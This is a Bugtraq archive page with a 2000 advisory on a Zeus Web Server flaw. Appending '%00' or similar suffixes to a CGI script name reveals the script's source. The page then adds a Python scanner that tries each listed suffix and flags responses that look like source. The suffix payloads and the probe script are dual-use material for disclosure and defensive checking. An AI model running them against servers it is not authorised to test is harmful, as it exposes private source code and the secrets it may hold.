Bugtraq mailing list archives
[SAFER 000209.EXP.1.2] Zeus Web Server - obtaining source of CGI scripts
From: vanja () RELAYGROUP COM (Vanja Hrustic)
Date: Wed, 9 Feb 2000 01:56:03 +0700
__________________________________________________________
S.A.F.E.R. Security Bulletin 000209.EXP.1.2
__________________________________________________________

TITLE:    Zeus Web Server - obtaining source of CGI scripts
DATE:     February 09, 2000
NATURE:   Remote user can obtain access to sources of CGI scripts
AFFECTED: Zeus Web Server 3.1.x and 3.3.x
FIXES:    Zeus Web Server 3.3.5a is not vulnerable

DETAILS:

Sources of CGI scripts (and other files) can be read by any user if the '%00' string is appended to the name of the CGI script. The following strings can also be appended in order to reveal the source:

%G0
%W0
%EW
%FG
%UW
%VG

PROBLEM:

The Zeus Web server is vulnerable to a problem that allows remote users to see the source of CGI scripts. Any user can append '%00' to the name of the CGI script and view the source. Files in directories that are configured to contain executable scripts (/cgi-bin, for example) are not subject to this problem; only scripts served from other directories are affected.

FIXES:

Zeus Technology has responded immediately, and fixed the problem in a matter of hours. It is really a pleasure to get such a quick response from the vendor. All kudos to them.

The fixed version is available at:
ftp://ftp.zeustechnology.com/pub/products/z3

All customers are advised to upgrade.

__________________________________________________________
S.A.F.E.R. - Security Alert For Enterprise Resources
Copyright (c) 2000 The Relay Group
http://safer.siamrelay.com --- security () relaygroup com
__________________________________________________________
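The check a practitioner would want after reading the above is a quick way to test a script URL against every suffix the advisory lists and decide whether the server handed back source instead of CGI output. The script below is an added example written for this page; it is not part of the advisory and not Zeus Technology's code. It requests the script once unmodified (the baseline) and once per suffix, and flags a suffix when the response differs from the baseline and begins with something that looks like script source (a shebang, a `<?`/`<%` opening tag, a `use`/`import`/`#include` line). The host `example.test`, the path `/test.cgi`, the sample Perl source and the two fake fetch functions are constructed for the offline demonstration; `scan()` accepts any fetch function so the same logic can be pointed at a live server with the bundled `urllib` fetcher.

```python
"""Probe a CGI URL for the '%00'-style source-disclosure suffixes from the
SAFER 000209 advisory. Added example for this page, not vendor code."""
import urllib.error
import urllib.request

# Suffixes named in the advisory, in the order it lists them.
SUFFIXES = ["%00", "%G0", "%W0", "%EW", "%FG", "%UW", "%VG"]

# Strings that, at the start of a response body, suggest raw source
# rather than rendered CGI output. Heuristic; tune per environment.
SOURCE_MARKERS = ("#!", "<?", "<%", "use ", "import ", "#include", "package ")


def probe_urls(script_url):
    """Return (suffix, url) pairs: the script URL with each suffix appended."""
    return [(s, script_url + s) for s in SUFFIXES]


def looks_like_source(body, baseline):
    """True if the suffixed response differs from the normal CGI output
    and its first bytes look like script source."""
    if body == baseline:
        return False
    head = body.lstrip()[:64]
    return any(head.startswith(m) for m in SOURCE_MARKERS)


def classify(baseline, responses):
    """Return the suffixes whose response appears to disclose source."""
    return [s for s, body in responses.items() if looks_like_source(body, baseline)]


def fetch(url, timeout=10):
    """Live fetcher for real use; error bodies are returned, not raised,
    because a 404/500 body is still useful for the comparison."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("latin-1")
    except urllib.error.HTTPError as err:
        return err.read().decode("latin-1")


def scan(script_url, fetch_fn=fetch):
    """Fetch baseline plus every suffixed variant; return leaking suffixes."""
    baseline = fetch_fn(script_url)
    responses = {s: fetch_fn(u) for s, u in probe_urls(script_url)}
    return classify(baseline, responses)


# --- Constructed offline sample (not captured from a real server) ---------
SAMPLE_SOURCE = (
    "#!/usr/bin/perl\n"
    'print "Content-type: text/html\\n\\n";\n'
    'print "hello";\n'
)
SAMPLE_OUTPUT = "hello"


def fake_vulnerable(url):
    """Behaves like the advisory describes: any listed suffix returns source."""
    return SAMPLE_SOURCE if url.endswith(tuple(SUFFIXES)) else SAMPLE_OUTPUT


def fake_fixed(url):
    """A patched server: suffixed names simply do not resolve."""
    return "404 Not Found" if url.endswith(tuple(SUFFIXES)) else SAMPLE_OUTPUT


if __name__ == "__main__":
    target = "http://example.test/test.cgi"  # hypothetical target
    print("vulnerable server leaks via:", scan(target, fake_vulnerable))
    print("fixed server leaks via:     ", scan(target, fake_fixed))
```

Point the live fetcher at a script that lives outside a directory configured for executables, since the advisory states that /cgi-bin-style directories are not affected; a clean result there says nothing about scripts served by extension elsewhere. The marker heuristic is only an indicator: a script whose normal output already begins with one of the marker strings, or a server that answers every malformed path with the same custom page, needs the response bodies compared by hand.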
Current thread:
- [SAFER 000209.EXP.1.2] Zeus Web Server - obtaining source of CGI scripts Vanja Hrustic (Feb 08)